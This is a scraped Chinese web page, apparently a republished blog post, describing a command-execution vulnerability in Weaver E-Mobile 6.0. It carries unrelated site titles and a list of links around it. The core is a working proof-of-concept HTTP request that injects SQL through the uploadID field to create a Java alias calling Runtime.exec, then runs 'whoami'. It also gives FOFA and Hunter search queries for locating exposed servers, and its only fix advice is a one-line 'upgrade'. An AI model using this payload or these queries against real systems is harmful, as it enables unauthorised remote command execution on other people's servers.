当前位置: 首页 > news >正文

玉田县住房和城乡建设局网站wordpress 三款站群插件之比较

玉田县住房和城乡建设局网站,wordpress 三款站群插件之比较,app开发常用软件,开发一套软件大概要多少钱声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 一、漏洞原理 泛微E-Mobile 6.0存在命令执行漏洞的问题,在…

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞原理

泛微E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。

二、网络空间测绘

fofa

"Weaver E-Mobile"

Hunter

web.body=Weaver E-Mobile

三、poc

POST /client.do HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Length: 1147------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="method"getupload
------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="uploadID"1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('whoami');--
------WebKitFormBoundaryTm8YXcJeyKDClbU7--

四、漏洞复现

先见一下面,访问漏洞环境

burp抓包,放poc,拿下

五、修复建议

 升级版本,低版本漏洞太多了

泛微e-office体验服务中心_泛微移动办公OA系统标准版_中小组织办公数字化产品

http://www.yayakq.cn/news/185664/

相关文章:

  • 网站公司是做什么的南通外贸网站制作
  • 关键词挖掘工具网站在哪里查公司名字有没有注册
  • 上海网站改版方案网站建设作业多少钱
  • 邢台做网站邮箱软件设计要求
  • 专用于做网站公司wordpress 密码爆破
  • 网站空间速度快郑州网站设计 郑州网站开发
  • wordpress用户定期清理手机网站优化公司
  • 电子政务网站代码世界四大广告公司
  • 国外网站做盗版网站推广计划书
  • 深圳网站建设公司联华成都知名网站推广
  • 免费做app网站建设做京挑客的网站有哪些
  • 广州 环保 凡人网站建设微网站建设 上海
  • 中山市智能h5网站建设公司湖北潜江资讯网
  • 高端网站设计报价谷歌推广怎么做
  • 青岛做优化网站哪家好网站设计的文案
  • 2015做那个网站能致富做网站的公司如何运营
  • 网页显示站点不安全西安疾控最新通告今天
  • 做网站技术选择平面设计师招聘网
  • 高端网站建设seo十佳深圳网站设计
  • 网站标题更改查权重工具
  • 上往建站哈尔滨建设网站官网
  • 湖北网站建设推荐手机主页
  • 汕头网站关键词推广建立网站站点方法
  • 中国建设银行福清分行网站自己想弄个平台怎么弄
  • 北京南站是中高风险地区吗如何设计营销 网站建设
  • 专业的餐饮加盟网站建设哈尔滨建设鞋城
  • 福建网站开发企业如何用记事本做网站
  • 网站最新发布址做网站主题
  • 电商培训心得体会锦州网站seo
  • 无锡网站建设f7wl西部数码网站流量怎么充